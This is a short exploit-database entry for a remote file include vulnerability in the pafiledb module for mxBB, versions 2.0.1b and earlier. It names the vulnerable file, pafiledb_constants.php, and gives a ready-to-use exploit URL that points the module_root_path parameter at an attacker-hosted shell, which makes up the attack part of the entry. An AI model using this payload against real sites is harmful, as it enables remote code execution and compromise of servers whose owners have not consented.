id: 1325
date: 12/26/2006
title: mxBB Module pafiledb <= 2.0.1b Remote File Include Vulnerability
author: bd0rk
cves: 

================================================================
mxBB Module pafiledb <= 2.0.1b Remote File Include Vulnerability
================================================================



+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

mxBB Module pafileDB 2.0.1b Remote File Include Vulnerability
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


by bd0rk || SOH-Crew

Vulnerable Code in pafiledb_constants.php

Exploit: http://[site]/[path]/modules/mx_pafiledb/pafiledb/includes/pafiledb_constants.php?module_root_path=[Shell]




#  0day.today [2023-03-23]  #